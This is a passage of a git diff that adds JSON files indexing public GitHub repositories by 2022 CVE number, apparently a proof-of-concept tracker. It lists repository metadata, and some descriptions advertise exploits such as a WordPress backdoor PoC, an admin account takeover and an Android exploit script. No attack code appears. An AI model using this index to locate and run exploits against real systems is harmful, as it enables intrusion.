"topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1609.json b/2022/CVE-2022-1609.json new file mode 100644 index 0000000000..e9fe8f3d4f --- /dev/null +++ b/2022/CVE-2022-1609.json @@ -0,0 +1,126 @@ +[ + { + "id": 497003119, + "name": "CVE-2022-1609", + "full_name": "savior-only\/CVE-2022-1609", + "owner": { + "login": "savior-only", + "id": 69495405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69495405?v=4", + "html_url": "https:\/\/github.com\/savior-only", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/savior-only\/CVE-2022-1609", + "description": "CVE-2022-1609 WordPress Weblizar后门", + "fork": false, + "created_at": "2022-05-27T13:15:38Z", + "updated_at": "2024-01-14T06:48:26Z", + "pushed_at": "2022-05-27T13:16:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501689548, + "name": "CVE-2022-1609", + "full_name": "0xSojalSec\/CVE-2022-1609", + "owner": { + "login": "0xSojalSec", + "id": 92203029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xSojalSec\/CVE-2022-1609", + "description": "Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor", + "fork": false, + "created_at": "2022-06-09T14:36:00Z", + "updated_at": "2023-02-16T21:06:34Z", + "pushed_at": "2022-06-08T15:19:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 501689867, + "name": "-CVE-2022-1609", + "full_name": "0xSojalSec\/-CVE-2022-1609", + "owner": { + "login": "0xSojalSec", + "id": 92203029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92203029?v=4", + "html_url": "https:\/\/github.com\/0xSojalSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xSojalSec\/-CVE-2022-1609", + "description": "Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor", + "fork": false, + "created_at": "2022-06-09T14:36:55Z", + "updated_at": "2024-08-12T20:23:59Z", + "pushed_at": "2022-06-09T14:44:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 631257182, + "name": "cve-2022-1609-exploit", + "full_name": "w4r3s\/cve-2022-1609-exploit", + "owner": { + "login": "w4r3s", + "id": 119853210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119853210?v=4", + "html_url": "https:\/\/github.com\/w4r3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w4r3s\/cve-2022-1609-exploit", + "description": "Exploit for CVE-2022-1609 WordPress Weblizar Backdoor.", + "fork": false, + "created_at": "2023-04-22T12:51:09Z", + "updated_at": "2023-07-05T12:08:37Z", + "pushed_at": "2023-04-22T12:51:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1679.json b/2022/CVE-2022-1679.json new file mode 100644 index 0000000000..3782081379 --- /dev/null +++ b/2022/CVE-2022-1679.json @@ -0,0 +1,64 @@ +[ + { + "id": 557313564, + "name": "-Detection-and-Mitigation-for-CVE-2022-1679", + "full_name": "EkamSinghWalia\/-Detection-and-Mitigation-for-CVE-2022-1679", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/-Detection-and-Mitigation-for-CVE-2022-1679", + "description": null, + "fork": false, + "created_at": "2022-10-25T13:15:20Z", + "updated_at": "2022-11-11T16:23:49Z", + "pushed_at": "2022-10-25T13:17:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 690703239, + "name": "Detection-and-Mitigation-for-CVE-2022-1679", + "full_name": "ov3rwatch\/Detection-and-Mitigation-for-CVE-2022-1679", + "owner": { + "login": "ov3rwatch", + "id": 23441286, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23441286?v=4", + "html_url": "https:\/\/github.com\/ov3rwatch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ov3rwatch\/Detection-and-Mitigation-for-CVE-2022-1679", + "description": null, + "fork": false, + "created_at": "2023-09-12T17:47:01Z", + "updated_at": "2023-09-12T17:48:39Z", + "pushed_at": "2023-09-12T17:48:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1802.json b/2022/CVE-2022-1802.json new file mode 100644 index 0000000000..073d488950 --- /dev/null +++ b/2022/CVE-2022-1802.json @@ -0,0 +1,33 @@ +[ + { + "id": 526810658, + "name": "CVE-2022-1802", + "full_name": "mistymntncop\/CVE-2022-1802", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-1802", + "description": null, + "fork": false, + "created_at": "2022-08-20T03:01:30Z", + "updated_at": "2024-10-20T03:46:31Z", + "pushed_at": "2023-02-20T23:29:21Z", + "stargazers_count": 153, + "watchers_count": 153, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 32, + "watchers": 153, + "score": 0, + "subscribers_count": 12 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1903.json b/2022/CVE-2022-1903.json new file mode 100644 index 0000000000..b64330b304 --- /dev/null +++ b/2022/CVE-2022-1903.json @@ -0,0 +1,39 @@ +[ + { + "id": 508220013, + "name": "CVE-2022-1903", + "full_name": "biulove0x\/CVE-2022-1903", + "owner": { + "login": "biulove0x", + "id": 105073212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105073212?v=4", + "html_url": "https:\/\/github.com\/biulove0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/biulove0x\/CVE-2022-1903", + "description": "ARMember < 3.4.8 - Unauthenticated Admin Account Takeover", + "fork": false, + "created_at": "2022-06-28T08:39:12Z", + "updated_at": "2022-06-30T06:04:46Z", + "pushed_at": "2022-06-28T11:28:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1903", + "python3", + "vulnerabilities", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1966.json b/2022/CVE-2022-1966.json new file mode 100644 index 0000000000..8b0bdf0567 --- /dev/null +++ b/2022/CVE-2022-1966.json @@ -0,0 +1,33 @@ +[ + { + "id": 502020668, + "name": "CVE-2022-1966", + "full_name": "ASkyeye\/CVE-2022-1966", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2022-1966", + "description": null, + "fork": false, + "created_at": "2022-06-10T11:39:40Z", + "updated_at": "2023-03-03T16:01:17Z", + "pushed_at": "2022-06-10T11:35:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1972.json b/2022/CVE-2022-1972.json new file mode 100644 index 0000000000..b547daae7e --- /dev/null +++ b/2022/CVE-2022-1972.json @@ -0,0 +1,33 @@ +[ + { + "id": 502049606, + "name": "CVE-2022-1972-infoleak-PoC", + "full_name": "randorisec\/CVE-2022-1972-infoleak-PoC", + "owner": { + "login": "randorisec", + "id": 23558951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23558951?v=4", + "html_url": "https:\/\/github.com\/randorisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/randorisec\/CVE-2022-1972-infoleak-PoC", + "description": null, + "fork": false, + "created_at": "2022-06-10T13:15:20Z", + "updated_at": "2024-10-12T07:48:23Z", + "pushed_at": "2022-06-13T17:00:33Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 20, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20004.json b/2022/CVE-2022-20004.json new file mode 100644 index 0000000000..4995d565d6 --- /dev/null +++ b/2022/CVE-2022-20004.json @@ -0,0 +1,33 @@ +[ + { + "id": 503718685, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20004", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20004", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20004", + "description": null, + "fork": false, + "created_at": "2022-06-15T10:29:03Z", + "updated_at": "2023-03-27T01:12:57Z", + "pushed_at": "2022-06-15T10:34:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20005.json b/2022/CVE-2022-20005.json new file mode 100644 index 0000000000..3f78c7cefe --- /dev/null +++ b/2022/CVE-2022-20005.json @@ -0,0 +1,33 @@ +[ + { + "id": 502025687, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20005", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20005", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20005", + "description": null, + "fork": false, + "created_at": "2022-06-10T11:56:59Z", + "updated_at": "2023-03-27T01:21:53Z", + "pushed_at": "2022-06-10T12:04:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20007.json b/2022/CVE-2022-20007.json new file mode 100644 index 0000000000..a144b6580c --- /dev/null +++ b/2022/CVE-2022-20007.json @@ -0,0 +1,64 @@ +[ + { + "id": 501898439, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20007", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20007", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20007", + "description": null, + "fork": false, + "created_at": "2022-06-10T04:26:02Z", + "updated_at": "2024-01-24T17:26:40Z", + "pushed_at": "2022-06-10T04:33:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 529194635, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20007", + "full_name": "pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20007", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20007", + "description": null, + "fork": false, + "created_at": "2022-08-26T09:25:36Z", + "updated_at": "2023-03-27T01:17:22Z", + "pushed_at": "2022-08-26T09:37:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20009.json b/2022/CVE-2022-20009.json new file mode 100644 index 0000000000..3b60815b1d --- /dev/null +++ b/2022/CVE-2022-20009.json @@ -0,0 +1,33 @@ +[ + { + "id": 675254019, + "name": "android-gadget", + "full_name": "szymonh\/android-gadget", + "owner": { + "login": "szymonh", + "id": 12231135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12231135?v=4", + "html_url": "https:\/\/github.com\/szymonh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/szymonh\/android-gadget", + "description": "CVE-2022-20009 - Description and sample exploit for Android USB Gadgets", + "fork": false, + "created_at": "2023-08-06T10:01:32Z", + "updated_at": "2023-08-17T17:20:39Z", + "pushed_at": "2023-08-06T11:03:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20126.json b/2022/CVE-2022-20126.json new file mode 100644 index 0000000000..efaf6bee94 --- /dev/null +++ b/2022/CVE-2022-20126.json @@ -0,0 +1,33 @@ +[ + { + "id": 534168096, + "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126", + "full_name": "Trinadh465\/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Bluetooth_AOSP10_r33_CVE-2022-20126", + "description": null, + "fork": false, + "created_at": "2022-09-08T10:51:13Z", + "updated_at": "2022-10-11T12:56:48Z", + "pushed_at": "2022-09-08T10:56:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20128.json b/2022/CVE-2022-20128.json new file mode 100644 index 0000000000..022a573aa3 --- /dev/null +++ b/2022/CVE-2022-20128.json @@ -0,0 +1,33 @@ +[ + { + "id": 534637282, + "name": "CVE-2022-20128", + "full_name": "irsl\/CVE-2022-20128", + "owner": { + "login": "irsl", + "id": 6357121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6357121?v=4", + "html_url": "https:\/\/github.com\/irsl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/irsl\/CVE-2022-20128", + "description": "Android Debug Bridge (adb) was vulnerable to directory traversal attacks that could have been mounted by rogue\/compromised adb daemons during an adb pull operation.", + "fork": false, + "created_at": "2022-09-09T12:40:21Z", + "updated_at": "2024-09-04T07:29:05Z", + "pushed_at": "2022-09-09T12:42:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20130.json b/2022/CVE-2022-20130.json new file mode 100644 index 0000000000..fec178d0a9 --- /dev/null +++ b/2022/CVE-2022-20130.json @@ -0,0 +1,33 @@ +[ + { + "id": 509461641, + "name": "external_aac_AOSP10_r33_CVE-2022-20130", + "full_name": "Satheesh575555\/external_aac_AOSP10_r33_CVE-2022-20130", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_aac_AOSP10_r33_CVE-2022-20130", + "description": null, + "fork": false, + "created_at": "2022-07-01T13:16:14Z", + "updated_at": "2022-07-01T13:25:04Z", + "pushed_at": "2022-07-01T13:25:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20138.json b/2022/CVE-2022-20138.json new file mode 100644 index 0000000000..2707f70b19 --- /dev/null +++ b/2022/CVE-2022-20138.json @@ -0,0 +1,64 @@ +[ + { + "id": 515158255, + "name": "ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138", + "full_name": "ShaikUsaf\/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/ShaikUsaf-frameworks_base_AOSP10_r33_CVE-2022-20138", + "description": null, + "fork": false, + "created_at": "2022-07-18T11:36:28Z", + "updated_at": "2022-07-18T11:38:43Z", + "pushed_at": "2022-07-18T11:39:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 563392111, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20138", + "full_name": "Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20138", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/frameworks_base_AOSP10_r33_CVE-2022-20138", + "description": null, + "fork": false, + "created_at": "2022-11-08T14:16:45Z", + "updated_at": "2023-03-27T01:35:23Z", + "pushed_at": "2022-11-08T14:26:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20140.json b/2022/CVE-2022-20140.json new file mode 100644 index 0000000000..deb7cc45d4 --- /dev/null +++ b/2022/CVE-2022-20140.json @@ -0,0 +1,33 @@ +[ + { + "id": 778237386, + "name": "system_bt_aosp10_cve-2022-20140", + "full_name": "RenukaSelvar\/system_bt_aosp10_cve-2022-20140", + "owner": { + "login": "RenukaSelvar", + "id": 165150685, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165150685?v=4", + "html_url": "https:\/\/github.com\/RenukaSelvar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RenukaSelvar\/system_bt_aosp10_cve-2022-20140", + "description": null, + "fork": false, + "created_at": "2024-03-27T10:45:21Z", + "updated_at": "2024-03-27T10:48:05Z", + "pushed_at": "2024-03-27T10:48:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20142.json b/2022/CVE-2022-20142.json new file mode 100644 index 0000000000..ecb6ea85c4 --- /dev/null +++ b/2022/CVE-2022-20142.json @@ -0,0 +1,64 @@ +[ + { + "id": 510346412, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20142", + "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "description": null, + "fork": false, + "created_at": "2022-07-04T12:16:05Z", + "updated_at": "2023-03-27T01:20:35Z", + "pushed_at": "2022-07-04T12:21:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 529215266, + "name": "frameworks_base_AOSP10_r33_CVE-2022-20142", + "full_name": "pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "owner": { + "login": "pazhanivel07", + "id": 97434034, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97434034?v=4", + "html_url": "https:\/\/github.com\/pazhanivel07", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pazhanivel07\/frameworks_base_AOSP10_r33_CVE-2022-20142", + "description": null, + "fork": false, + "created_at": "2022-08-26T10:35:11Z", + "updated_at": "2023-03-27T01:20:22Z", + "pushed_at": "2022-08-26T10:42:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20186.json b/2022/CVE-2022-20186.json new file mode 100644 index 0000000000..4381e2f1be --- /dev/null +++ b/2022/CVE-2022-20186.json @@ -0,0 +1,64 @@ +[ + { + "id": 578715432, + "name": "CVE-2022-20186_CTXZ", + "full_name": "Bariskizilkaya\/CVE-2022-20186_CTXZ", + "owner": { + "login": "Bariskizilkaya", + "id": 39498732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39498732?v=4", + "html_url": "https:\/\/github.com\/Bariskizilkaya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bariskizilkaya\/CVE-2022-20186_CTXZ", + "description": null, + "fork": false, + "created_at": "2022-12-15T17:57:26Z", + "updated_at": "2024-10-28T11:27:09Z", + "pushed_at": "2022-10-30T12:26:06Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821468476, + "name": "CVE-2022-20186", + "full_name": "SmileTabLabo\/CVE-2022-20186", + "owner": { + "login": "SmileTabLabo", + "id": 112930114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112930114?v=4", + "html_url": "https:\/\/github.com\/SmileTabLabo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SmileTabLabo\/CVE-2022-20186", + "description": null, + "fork": false, + "created_at": "2024-06-28T15:53:30Z", + "updated_at": "2024-06-28T17:27:31Z", + "pushed_at": "2024-06-28T17:05:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20223.json b/2022/CVE-2022-20223.json new file mode 100644 index 0000000000..9a8e9a6455 --- /dev/null +++ b/2022/CVE-2022-20223.json @@ -0,0 +1,33 @@ +[ + { + "id": 878325587, + "name": "cve-2022-20223", + "full_name": "xbee9\/cve-2022-20223", + "owner": { + "login": "xbee9", + "id": 183838019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183838019?v=4", + "html_url": "https:\/\/github.com\/xbee9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbee9\/cve-2022-20223", + "description": "A simple bash script for exploiting Android 10\/11\/12 using cve-2022-20223.", + "fork": false, + "created_at": "2024-10-25T07:22:46Z", + "updated_at": "2024-10-25T07:29:30Z", + "pushed_at": "2024-10-25T07:29:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20224.json b/2022/CVE-2022-20224.json new file mode 100644 index 0000000000..28ce603479 --- /dev/null +++ b/2022/CVE-2022-20224.json @@ -0,0 +1,64 @@ +[ + { + "id": 526077942, + "name": "system_bt_AOSP10_r33_CVE-2022-20224", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20224", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20224", + "description": null, + "fork": false, + "created_at": "2022-08-18T06:04:41Z", + "updated_at": "2022-08-18T06:22:42Z", + "pushed_at": "2022-08-18T06:24:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624387380, + "name": "platform_system_bt_AOSP10_r33_CVE-2022-20224", + "full_name": "hshivhare67\/platform_system_bt_AOSP10_r33_CVE-2022-20224", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/platform_system_bt_AOSP10_r33_CVE-2022-20224", + "description": null, + "fork": false, + "created_at": "2023-04-06T11:02:47Z", + "updated_at": "2023-04-06T11:08:20Z", + "pushed_at": "2023-04-06T11:09:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-20229.json b/2022/CVE-2022-20229.json new file mode 100644 index 0000000000..fd3a550104 --- /dev/null +++ b/2022/CVE-2022-20229.json @@ -0,0 +1,33 @@ +[ + { + "id": 526095462, + "name": "system_bt_AOSP10_r33_CVE-2022-20229", + "full_name": "ShaikUsaf\/system_bt_AOSP10_r33_CVE-2022-20229", + "owner": { + "login": "ShaikUsaf", + "id": 100413972, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4", + "html_url": "https:\/\/github.com\/ShaikUsaf", + "user_view_type": "public" + }, + "html_url": 